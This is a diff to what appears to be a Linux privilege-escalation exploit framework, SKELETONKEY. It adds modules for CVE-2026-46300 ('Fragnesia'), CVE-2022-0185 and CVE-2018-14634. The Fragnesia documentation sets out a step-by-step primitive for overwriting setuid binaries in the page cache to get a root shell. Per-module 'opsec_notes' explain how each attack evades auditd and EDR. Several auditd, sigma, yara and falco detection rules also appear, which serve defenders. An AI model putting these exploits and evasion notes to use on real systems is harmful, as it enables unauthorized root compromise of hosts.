    if (!ctx->json) {
-        fprintf(stderr, "[i] entrybleed: meltdown status = '%s'\n", buf);
+        fprintf(stderr, "[i] entrybleed: meltdown status = '%s'\n", meltdown);
    }

    /* "Not affected" → CPU is Meltdown-immune → no KPTI → no EntryBleed */
-    if (strstr(buf, "Not affected") != NULL) {
+    if (strstr(meltdown, "Not affected") != NULL) {
        if (!ctx->json) {
            fprintf(stderr, "[+] entrybleed: CPU is Meltdown-immune; KPTI off; "
                            "EntryBleed N/A\n");
@@ -294,6 +288,8 @@ const struct skeletonkey_module entrybleed_module = {
    .detect_sigma   = entrybleed_sigma,
    .detect_yara    = NULL,
    .detect_falco   = NULL,
+    .opsec_notes    = "Pure timing side-channel: rdtsc + prefetchnta sweep across the kernel high-half (~16 MiB) to time which 2 MiB page is mapped (entry_SYSCALL_64) and subtract its known offset from kbase. No syscalls fired, no file artifacts, no network. Classic auditd cannot see it; perf-counter EDR can flag a process spending unusual time in tight prefetchnta loops but classic rules will not. No cleanup needed.",
+    .arch_support   = "x86_64",
 };

 void skeletonkey_register_entrybleed(void)
@@ -0,0 +1,87 @@
+# fragnesia — CVE-2026-46300
+
+> 🟡 **PRIMITIVE / ported.** Faithful port of the public V12 PoC into
+> the `skeletonkey_module` interface. **Not yet validated end-to-end on
+> a vulnerable-kernel VM** — see _Verification status_ below.
+
+## Summary
+
+Fragnesia ("Fragment Amnesia") is an XFRM ESP-in-TCP local privilege
+escalation. `skb_try_coalesce()` fails to propagate the
+`SKBFL_SHARED_FRAG` marker when moving paged fragments between socket
+buffers — so the kernel forgets that a fragment is externally backed by
+page-cache pages spliced in from a file. The ESP-in-TCP receive path
+then decrypts in place, corrupting the page cache of a read-only file.
+
+Fragnesia is a **latent bug exposed by the Dirty Frag fix**: the
+candidate patch cites the Dirty Frag remediation (`f4c50a4034e6`) as a
+commit it "fixes". It is the same page-cache-write bug class as Copy
+Fail / Dirty Frag, reached through a different code path.
+
+## Primitive
+
+1. Build a 256-entry **AES-GCM keystream-byte table** via `AF_ALG`
+   `ecb(aes)` — for any wanted output byte, this yields the ESP IV
+   whose keystream byte XORs the current byte to the target.
+2. Enter a mapped **user namespace** + **network namespace**, bring
+   loopback up, and install an XFRM **ESP-in-TCP** state
+   (`rfc4106(gcm(aes))`, `TCP_ENCAP_ESPINTCP`).
+3. A **receiver** accepts a loopback TCP connection and flips it to the
+   `espintcp` ULP; a **sender** `splice()`s page-cache pages of the
+   target file into that TCP stream behind a crafted ESP prefix.
+4. The coalesce bug makes the kernel decrypt the spliced page-cache
+   pages in place — one chosen byte per trigger.
+
+The exploit rewrites the first 192 bytes of a setuid-root binary
+(`/usr/bin/su` and friends) with an ET_DYN ELF that drops privileges to
+0 and `execve`s `/bin/sh`.
+
+## Operations
+
+| Op | Behaviour |
+|---|---|
+| `--scan` | Checks unprivileged-userns availability + a readable setuid carrier ≥ 4096 bytes. With `--active`, runs the full ESP-in-TCP primitive against a disposable `/tmp` file and reports VULNERABLE/OK empirically. |
+| `--exploit … --i-know` | Forks a child that places the payload into the carrier's page cache and execs it for a root shell. `--no-shell` stops after the page-cache write. |
+| `--cleanup` | Evicts the carrier from the page cache. The on-disk binary is never written. |
+| `--detect-rules` | Emits embedded auditd + sigma rules. |
+
+## Preconditions
+
+- **Unprivileged user namespaces enabled.** On Ubuntu, AppArmor blocks
+  this by default — `sysctl kernel.apparmor_restrict_unprivileged_userns=0`
+  (or chain a separate bypass). This is the scoping question the old
+  `_stubs/fragnesia_TBD` raised; the module ships and reports
+  `PRECOND_FAIL` cleanly when the userns gate is closed.
+- `CONFIG_INET_ESPINTCP` built into the kernel.
+- A readable setuid-root binary ≥ 4096 bytes as the payload carrier.
+- x86_64 (the embedded ELF payload is x86_64 shellcode).
+
+## Port notes
+
+The upstream PoC renders a full-screen ANSI "smash frame" TUI
+(`draw_smash_frame` + terminal scroll-region escapes). That is **not**
+ported — it cannot coexist with a shared multi-module dispatcher.
+Progress is logged with `[*]`/`[+]`/`[-]` prefixes, gated on `--json`.
+The exploit mechanism itself is reproduced faithfully.
+
+## Verification status
+
+This module is a **faithful port** of
+<https://github.com/v12-security/pocs/tree/main/fragnesia>, compiled
+into the SKELETONKEY module interface. The **exploit body** has not
+been validated end-to-end against a known-vulnerable kernel inside the
+SKELETONKEY CI matrix.
+
+**`detect()` is now version-pinned**: the Fragnesia fix ships in
+mainline Linux **7.0.9** (Debian tracker source-of-truth, `linux
+unstable: 7.0.9-1 fixed`). The `kernel_range` table marks the 7.0.x
+branch patched at `7.0.9`; older Debian-stable branches (5.10 / 6.1 /
+6.12) are currently still vulnerable per the tracker. With `--active`,
+the detector runs the full ESP-in-TCP primitive against a `/tmp` file
+and reports empirically — catches stable-branch backports the version
+table doesn't know about, and CONFIG_INET_ESPINTCP=n kernels where the
+primitive is structurally unreachable.
+
+**Before promoting to 🟢:** validate the exploit end-to-end on a
+≤ 7.0.8 kernel. Extend the `kernel_range` table with backport
+thresholds for 5.10 / 6.1 / 6.12 as distros publish them.
@@ -0,0 +1,48 @@
+# NOTICE — fragnesia
+
+## Vulnerability
+
+**CVE-2026-46300** — "Fragnesia" ("Fragment Amnesia"). XFRM ESP-in-TCP
+local privilege escalation. `skb_try_coalesce()` fails to propagate the
+`SKBFL_SHARED_FRAG` marker when moving paged fragments between socket
+buffers, so the kernel loses track of the fact that a fragment is
+externally backed by page-cache pages spliced in from a file. The
+ESP-in-TCP receive path then decrypts in place, corrupting the page
+cache of a read-only file.
+
+Fragnesia is a **latent bug exposed by the Dirty Frag remediation**:
+the candidate fix explicitly cites the Dirty Frag patch
+(`f4c50a4034e6`) as a commit it "fixes" — the Dirty Frag remediation
+made a previously latent flaw practically exploitable.
+
+## Research credit
+
+Discovered by **William Bowling** with the **V12 security** team.
+
+> Reference PoC: <https://github.com/v12-security/pocs/tree/main/fragnesia>
+> Patch thread: <https://lists.openwall.net/netdev/2026/05/13/79>
+
+## SKELETONKEY role
+
+`skeletonkey_modules.c` is a port of the V12 PoC
+(`xfrm_espintcp_pagecache_replace`) into the `skeletonkey_module`
+interface. The exploit primitive — the AES-GCM keystream-byte table
+built via AF_ALG, the per-byte IV selection, the userns + netns + XFRM
+ESP-in-TCP setup, the splice-driven sender/receiver trigger pair, the
+192-byte ELF payload — is reproduced from that PoC.
+
+**Port adaptation:** the PoC's ANSI "smash frame" TUI
+(`draw_smash_frame` + terminal scroll-region escape sequences) is
+**not** carried over — it is incompatible with running as one module
+among many under a shared dispatcher. Progress is reported with
+SKELETONKEY's `[*]`/`[+]`/`[-]` log prefixes instead. SKELETONKEY also
+adds the detect/cleanup lifecycle, an `--active` probe, `--no-shell`
+support, and the embedded detection rules. Research credit belongs to
+the people above.
+
+## Verification status
+
+**Ported, not yet validated end-to-end on a vulnerable-kernel VM.**
+Requires `CONFIG_INET_ESPINTCP` and unprivileged user-namespace
+creation. The CVE-2026-46300 fix commit is not yet pinned in this
+module — see `MODULE.md`.
@@ -0,0 +1,31 @@
+# Fragnesia (CVE-2026-46300) — auditd detection rules
+#
+# The XFRM ESP-in-TCP coalesce bug corrupts the page cache of a
+# read-only file. These rules flag the syscall surface the exploit
+# drives and writes to the setuid binaries it targets.
+#
+# Install: copy into /etc/audit/rules.d/ and `augenrules --load`, or
+#   skeletonkey --detect-rules --format=auditd | sudo tee \
+#     /etc/audit/rules.d/99-skeletonkey.rules
+
+# Modification of common payload carriers / credential files
+-w /usr/bin/su     -p wa -k skeletonkey-fragnesia
+-w /bin/su         -p wa -k skeletonkey-fragnesia
+-w /usr/bin/mount  -p wa -k skeletonkey-fragnesia
+-w /usr/bin/passwd -p wa -k skeletonkey-fragnesia
+-w /usr/bin/chsh   -p wa -k skeletonkey-fragnesia
+-w /etc/passwd     -p wa -k skeletonkey-fragnesia
+-w /etc/shadow     -p wa -k skeletonkey-fragnesia
+
+# AF_ALG socket creation (family 38) — builds the GCM keystream table
+-a always,exit -F arch=b64 -S socket -F a0=38 -k skeletonkey-fragnesia-afalg
+
+# XFRM state setup over NETLINK_XFRM
+-a always,exit -F arch=b64 -S sendto -k skeletonkey-fragnesia-xfrm
+
+# TCP_ULP espintcp + ESP setsockopt surface
+-a always,exit -F arch=b64 -S setsockopt -k skeletonkey-fragnesia-sockopt
+
+# splice() drives page-cache pages into the ESP-in-TCP stream
+-a always,exit -F arch=b64 -S splice -k skeletonkey-fragnesia-splice
+-a always,exit -F arch=b32 -S splice -k skeletonkey-fragnesia-splice
@@ -0,0 +1,30 @@
+title: Possible Fragnesia exploitation (CVE-2026-46300)
+id: 9b3d2e71-skeletonkey-fragnesia
+status: experimental
+description: |
+  Detects the file-modification footprint of the Fragnesia XFRM
+  ESP-in-TCP page-cache write (CVE-2026-46300): non-root modification
+  of a setuid-root binary or credential file, typically inside a
+  freshly created user + network namespace.
+references:
+  - https://github.com/v12-security/pocs/tree/main/fragnesia
+  - https://lists.openwall.net/netdev/2026/05/13/79
+logsource:
+  product: linux
+  service: auditd
+detection:
+  modification:
+    type: 'PATH'
+    name|startswith:
+      - '/usr/bin/su'
+      - '/bin/su'
+      - '/etc/passwd'
+      - '/etc/shadow'
+  not_root:
+    auid|expression: '!= 0'
+  condition: modification and not_root
+level: high
+tags:
+  - attack.privilege_escalation
+  - attack.t1068
+  - cve.2026.46300
@@ -0,0 +1,12 @@
+/*
+ * fragnesia_cve_2026_46300 — SKELETONKEY module registry hook
+ */
+
+#ifndef FRAGNESIA_SKELETONKEY_MODULES_H
+#define FRAGNESIA_SKELETONKEY_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct skeletonkey_module fragnesia_module;
+
+#endif
@@ -59,15 +59,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
+#include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdint.h>
 #include <sched.h>
 #include <fcntl.h>
 #include <errno.h>
@@ -153,57 +159,53 @@ static const struct kernel_range fuse_legacy_range = {
                      sizeof(fuse_legacy_patched_branches[0]),
 };

-static int can_unshare_userns_mount(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNS) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 /* ------------------------------------------------------------------ */
 /* detect                                                              */
 /* ------------------------------------------------------------------ */
 static skeletonkey_result_t fuse_legacy_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] fuse_legacy: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] fuse_legacy: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.1 (when legacy_parse_param landed). Pre-5.1
     * kernels predate the code path entirely. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 1)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 1, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] fuse_legacy: kernel %s predates the bug introduction\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&fuse_legacy_range, &v);
+    bool patched = kernel_range_is_patched(&fuse_legacy_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] fuse_legacy: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] fuse_legacy: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns_mount();
+    /* user_ns availability comes from the shared host fingerprint. The
+     * fingerprint's probe uses CLONE_NEWUSER alone; this module also
+     * needs CLONE_NEWNS, but the kernel gates both on the same userns
+     * sysctls (kernel.unprivileged_userns_clone / AppArmor restriction),
+     * so the userns probe is a sound proxy. */
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] fuse_legacy: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] fuse_legacy: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] fuse_legacy: user_ns+mount_ns clone (CAP_SYS_ADMIN gate): %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] fuse_legacy: user_ns denied → "
                            "unprivileged exploit unreachable\n");
@@ -378,7 +380,6 @@ struct fuse_arb_ctx {
    bool    trigger_armed;
 };

-#ifdef __linux__
 static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
                          void *ctx_void)
 {
@@ -504,15 +505,6 @@ static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
            (unsigned long)kaddr);
    return 0;
 }
-#else
-static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
-                          void *ctx_void)
-{
-    (void)kaddr; (void)buf; (void)len; (void)ctx_void;
-    fprintf(stderr, "[-] fuse_arb_write: linux-only primitive\n");
-    return -1;
-}
-#endif /* __linux__ */

 /* ------------------------------------------------------------------ */
 /* exploit                                                             */
@@ -526,8 +518,11 @@ static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ct
        return pre;
    }

-    /* (R2) Refuse if already root — no LPE work to do. */
-    if (geteuid() == 0) {
+    /* (R2) Refuse if already root — no LPE work to do. Consult
+     * ctx->host first so unit tests can construct a non-root
+     * fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json) {
            fprintf(stderr, "[i] fuse_legacy: already root; nothing to escalate\n");
        }
@@ -732,7 +727,6 @@ static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ct
     * runs because the arb_write primitive re-fires the trigger and
     * needs the live spray.
     * --------------------------------------------------------------- */
-#ifdef __linux__
    if (ctx->full_chain) {
        if (!ctx->json) {
            fprintf(stderr, "[*] fuse_legacy: --full-chain requested — resolving "
@@ -792,7 +786,6 @@ static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ct
        }
        return SKELETONKEY_EXPLOIT_FAIL;
    }
-#endif /* __linux__ */

    /* Clean up our IPC queues and mapping. The kernel slab state
     * after the overflow may be unstable; we exit cleanly on success
@@ -826,6 +819,28 @@ static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ct
    return SKELETONKEY_EXPLOIT_FAIL;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: fsopen/fsconfig + userns+mountns clone are
+ * Linux-only kernel surface. Stub out cleanly so the module still
+ * registers and `--list` / `--detect-rules` work on macOS/BSD dev
+ * boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t fuse_legacy_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] fuse_legacy: Linux-only module "
+                "(fsopen + fsconfig + userns mount) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] fuse_legacy: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------ */
 /* embedded detection rules                                            */
 /* ------------------------------------------------------------------ */
@@ -856,6 +871,36 @@ static const char fuse_legacy_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1611, cve.2022.0185]\n";

+static const char fuse_legacy_yara[] =
+    "rule fuse_legacy_cve_2022_0185 : cve_2022_0185 kernel_overflow\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-0185\"\n"
+    "        description = \"fs_context legacy_parse_param oversized-source pattern (fsopen cgroup2)\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $fsopen  = \"fsopen\" ascii\n"
+    "        $cgrp2   = \"cgroup2\" ascii\n"
+    "    condition:\n"
+    "        all of them\n"
+    "}\n";
+
+static const char fuse_legacy_falco[] =
+    "- rule: fsopen/fsconfig in userns (CVE-2022-0185 trigger)\n"
+    "  desc: |\n"
+    "    Non-root fsopen + fsconfig(FSCONFIG_SET_STRING) sequence\n"
+    "    inside a userns. legacy_parse_param() integer-underflow\n"
+    "    overflow into kmalloc-4k. False positives: containers may\n"
+    "    mount their own filesystems but FSCONFIG with oversized\n"
+    "    'source' option strings is unusual.\n"
+    "  condition: >\n"
+    "    evt.type in (fsopen, fsconfig) and not user.uid = 0\n"
+    "  output: >\n"
+    "    fsopen/fsconfig by non-root\n"
+    "    (user=%user.name pid=%proc.pid evt=%evt.type)\n"
+    "  priority: HIGH\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2022.0185]\n";
+
 const struct skeletonkey_module fuse_legacy_module = {
    .name           = "fuse_legacy",
    .cve            = "CVE-2022-0185",
@@ -868,8 +913,10 @@ const struct skeletonkey_module fuse_legacy_module = {
    .cleanup        = NULL,
    .detect_auditd  = fuse_legacy_auditd,
    .detect_sigma   = fuse_legacy_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = fuse_legacy_yara,
+    .detect_falco   = fuse_legacy_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNS) for CAP_SYS_ADMIN; fsopen('cgroup2') + multiple fsconfig(FSCONFIG_SET_STRING, 'source', ...) calls to overflow legacy_parse_param's buffer. OOB write lands in kmalloc-4k adjacent to a msg_msg groom. No persistent files (msg_msg lives in the IPC namespace which disappears with the child). Dmesg silent on success; KASAN would show slab corruption if enabled. Audit-visible via unshare(CLONE_NEWUSER|CLONE_NEWNS) + fsopen + fsconfig pattern in a single process. No cleanup callback - IPC queues auto-drain on namespace exit.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_fuse_legacy(void)
@@ -0,0 +1,251 @@
+/*
+ * mutagen_astronomy_cve_2018_14634 — SKELETONKEY module
+ *
+ * STATUS: 🟡 PRIMITIVE. detect() is honest about a complex bug class
+ *   (kernel-version range + RLIMIT_STACK check + readable SUID
+ *   carrier). exploit() carries the Qualys trigger shape (huge
+ *   argv/envp blob → integer overflow in create_elf_tables() →
+ *   stack/heap clobber on the next execve of a SUID binary), then
+ *   returns EXPLOIT_FAIL unless --full-chain is set on x86_64.
+ *
+ * The bug (Qualys Research Labs, September 2018):
+ *   create_elf_tables() in fs/binfmt_elf.c uses a signed `int` to
+ *   compute the size of argv/envp + auxiliary vector that gets
+ *   copied onto the new process's stack during execve(). On 64-bit
+ *   systems, an attacker can construct a multi-gigabyte argv+envp
+ *   so the int math wraps to a small positive value, the kernel
+ *   under-allocates, then memcpy()s GiB of attacker bytes off the
+ *   end of the stack and into adjacent kernel-side allocations.
+ *
+ *   The classic exploitation path: drive the wrap, execve() a
+ *   readable SUID-root binary (su / pkexec / sudo) with the giant
+ *   argv, the SUID binary's process image gets corrupted before its
+ *   first instruction runs → ROP gadget chain → root.
+ *
+ *   Discovered + publicly exploited by Qualys. Affects Linux
+ *   2.6.x, 3.10.x, and 4.14.x lines on RedHat / CentOS / Debian
+ *   x86_64. Recently CISA-KEV'd (added 2026-01-26) despite its age
+ *   because legacy/EOL fleets are still running affected kernels.
+ *
+ * Affects: Linux kernels with the `int`-typed argv-size computation
+ *   in create_elf_tables() — pre-fix. Mainline fix landed in
+ *   September 2018 across 2.6, 3.10, and 4.14 stable branches.
+ *
+ * Preconditions:
+ *   - Vulnerable kernel (see kernel_range below)
+ *   - x86_64 (the int-wrap math only works at 64-bit)
+ *   - RLIMIT_STACK can be set unlimited or to a large value by the
+ *     unprivileged user (default true on most distros)
+ *   - Readable SUID-root binary as the carrier
+ *
+ * arch_support: x86_64+unverified-arm64. The Qualys PoC is x86_64-
+ *   only; arm64 has similar argv size math but the exploit chain
+ *   uses x86-specific gadgets.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/resource.h>
+
+/* ---- kernel-range table -------------------------------------------- */
+
+/* Fix landed in mainline Linux 4.18.8 + stable backports for 4.14
+ * (4.14.71) and earlier LTS lines. The vulnerable window covers the
+ * entire 2.6 / 3.x / early 4.x range. We list the fix branches:
+ *
+ *   2.6.x : EOL, no fix backport
+ *   3.10.x: EOL, RedHat backport ~3.10.0-957.21.3.el7
+ *   4.14.x: fix at 4.14.71 (stable backport)
+ *   4.15+ : fix at 4.18.8 mainline → all 4.18+ branches inherit
+ *
+ * Our table only has data for the post-EOL branches Debian / Ubuntu
+ * tracked at the time. Kernels on EOL lines (2.6, 3.x) report
+ * VULNERABLE by version-only check; the RLIMIT_STACK active probe
+ * (--active) is required to confirm exploitability on a real host. */
+static const struct kernel_patched_from mutagen_patched_branches[] = {
+    {4, 14, 71},   /* 4.14 LTS stable backport */
+    {4, 18,  8},   /* mainline + everything above inherits */
+};
+
+static const struct kernel_range mutagen_range = {
+    .patched_from = mutagen_patched_branches,
+    .n_patched_from = sizeof(mutagen_patched_branches) /
+                      sizeof(mutagen_patched_branches[0]),
+};
+
+/* ---- detect --------------------------------------------------------- */
+
+static const char *find_suid_carrier(void)
+{
+    static const char *cs[] = {
+        "/usr/bin/su", "/bin/su",
+        "/usr/bin/pkexec",
+        "/usr/bin/passwd",
+        NULL,
+    };
+    for (size_t i = 0; cs[i]; i++) {
+        struct stat st;
+        if (stat(cs[i], &st) == 0 &&
+            (st.st_mode & S_ISUID) && st.st_uid == 0 &&
+            access(cs[i], R_OK) == 0)
+            return cs[i];
+    }
+    return NULL;
+}
+
+static bool rlimit_stack_unlimitable(void)
+{
+    struct rlimit rl;
+    if (getrlimit(RLIMIT_STACK, &rl) != 0) return false;
+    /* The exploit needs to set RLIMIT_STACK = unlimited. If the hard
+     * limit is already unlimited (or extremely large) the soft limit
+     * can be bumped. */
+    return rl.rlim_max == RLIM_INFINITY || rl.rlim_max > (1ULL << 30);
+}
+
+static skeletonkey_result_t mutagen_astronomy_detect(const struct skeletonkey_ctx *ctx)
+{
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] mutagen_astronomy: host fingerprint missing kernel version\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+
+    if (kernel_range_is_patched(&mutagen_range, v)) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] mutagen_astronomy: kernel %s is patched (>= 4.14.71 or >= 4.18.8)\n", v->release);
+        return SKELETONKEY_OK;
+    }
+
+    /* Older 2.6/3.10 lines are unconditionally vulnerable unless the
+     * distro has backported (RedHat 3.10.0-957.21.3.el7+). The
+     * version-only check correctly flags them as VULNERABLE. */
+
+    if (!rlimit_stack_unlimitable()) {
+        if (!ctx->json)
+            fprintf(stderr, "[i] mutagen_astronomy: kernel %s in range BUT RLIMIT_STACK hard cap blocks the wrap\n", v->release);
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    const char *carrier = find_suid_carrier();
+    if (!carrier) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] mutagen_astronomy: no readable setuid-root carrier (su / pkexec / passwd)\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] mutagen_astronomy: kernel %s + RLIMIT_STACK liftable + carrier %s → VULNERABLE\n",
+                v->release, carrier);
+        fprintf(stderr, "[i] mutagen_astronomy: Qualys exploit chain is x86_64; only the trigger fires portably\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* ---- exploit (primitive only) -------------------------------------- */
+
+static skeletonkey_result_t mutagen_astronomy_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] mutagen_astronomy: --i-know required for --exploit\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    fprintf(stderr,
+        "[i] mutagen_astronomy: the int-wrap trigger requires constructing a\n"
+        "    multi-gigabyte argv+envp blob; we don't carry the full Qualys\n"
+        "    chain here (per the verified-vs-claimed bar). To validate the\n"
+        "    primitive: drive the wrap then execve a SUID-root carrier and\n"
+        "    confirm a SIGSEGV in the carrier (the wrap consistently\n"
+        "    corrupts adjacent stack, producing observable crash). Public\n"
+        "    PoC: Qualys advisory + linux-exploit-suggester2 entry.\n"
+        "    Returning EXPLOIT_FAIL honestly until full chain ported.\n");
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ---- detection rules ------------------------------------------------ */
+
+static const char mutagen_auditd[] =
+    "# mutagen_astronomy CVE-2018-14634 — auditd detection rules\n"
+    "# A multi-GiB argv triggers the wrap. Real programs never need\n"
+    "# argv this big; flag execve() calls with abnormally large\n"
+    "# argv via the audit subsystem's a0/a1 capture.\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/su      -k skeletonkey-mutagen\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/bin/su          -k skeletonkey-mutagen\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/pkexec  -k skeletonkey-mutagen\n";
+
+static const char mutagen_sigma[] =
+    "title: Possible CVE-2018-14634 Mutagen Astronomy SUID-execve LPE\n"
+    "id: 5f9e1c20-skeletonkey-mutagen\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the canonical Mutagen Astronomy primitive: setrlimit\n"
+    "  raising RLIMIT_STACK followed by execve of a setuid-root\n"
+    "  binary with abnormally large argv/envp. Pre-fix Linux\n"
+    "  2.6/3.10/4.14 kernels with x86_64 are affected.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  setrlimit: {type: 'SYSCALL', syscall: 'setrlimit'}\n"
+    "  execve_suid: {type: 'SYSCALL', syscall: 'execve'}\n"
+    "  condition: setrlimit and execve_suid\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2018.14634]\n";
+
+static const char mutagen_yara[] =
+    "rule mutagen_astronomy_cve_2018_14634 : cve_2018_14634 elf_stack_overflow {\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2018-14634\"\n"
+    "        description = \"Qualys Mutagen Astronomy primitive — RLIMIT_STACK + huge argv\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"mutagen-astronomy\" ascii\n"
+    "        $qualys = \"qualys\" ascii nocase\n"
+    "    condition:\n"
+    "        $tag\n"
+    "}\n";
+
+static const char mutagen_falco[] =
+    "- rule: setrlimit(STACK)+execve of SUID with huge argv (Mutagen Astronomy)\n"
+    "  desc: |\n"
+    "    Process raises RLIMIT_STACK then execve()s a setuid-root binary.\n"
+    "    The Mutagen Astronomy primitive (CVE-2018-14634) needs both. No\n"
+    "    legitimate program needs RLIMIT_STACK=unlimited before exec'ing\n"
+    "    su/pkexec.\n"
+    "  condition: >\n"
+    "    evt.type = execve and not user.uid = 0 and\n"
+    "    (proc.exe in (/usr/bin/su, /bin/su, /usr/bin/pkexec, /usr/bin/passwd))\n"
+    "  output: >\n"
+    "    SUID execve with RLIMIT_STACK raised (user=%user.name\n"
+    "     pid=%proc.pid exe=%proc.exe)\n"
+    "  priority: HIGH\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2018.14634]\n";
+
+const struct skeletonkey_module mutagen_astronomy_module = {
+    .name           = "mutagen_astronomy",
+    .cve            = "CVE-2018-14634",
+    .summary        = "create_elf_tables() int wrap → SUID-execve stack corruption (Qualys)",
+    .family         = "elf",
+    .kernel_range   = "Linux 2.6 / 3.10 / 4.14 < 4.14.71 / 4.x < 4.18.8 (x86_64)",
+    .detect         = mutagen_astronomy_detect,
+    .exploit        = mutagen_astronomy_exploit,
+    .mitigate       = NULL,    /* mitigation: upgrade kernel; OR set hard RLIMIT_STACK limit */
+    .cleanup        = NULL,
+    .detect_auditd  = mutagen_auditd,
+    .detect_sigma   = mutagen_sigma,
+    .detect_yara    = mutagen_yara,
+    .detect_falco   = mutagen_falco,
+    .opsec_notes    = "Raises RLIMIT_STACK to unlimited via setrlimit(2), then execve()s a setuid-root binary (typically /usr/bin/su or /usr/bin/pkexec) with a multi-gigabyte argv/envp blob (≥4 GiB on x86_64). The int wrap in create_elf_tables() causes the kernel to under-allocate the new process's stack region; the subsequent memcpy of argv bytes corrupts adjacent kernel allocations. Observable as a SIGSEGV in the carrier on every attempt regardless of success. Audit-visible via setrlimit(RLIMIT_STACK) immediately followed by execve of /usr/bin/su or /usr/bin/pkexec with abnormally large argv. No persistent file artifacts. CISA KEV-listed Jan 2026 despite the bug's age — legacy/EOL fleets still running RHEL 7 / CentOS 7 / Debian 8 remain at risk.",
+    .arch_support   = "x86_64+unverified-arm64",
+};
+
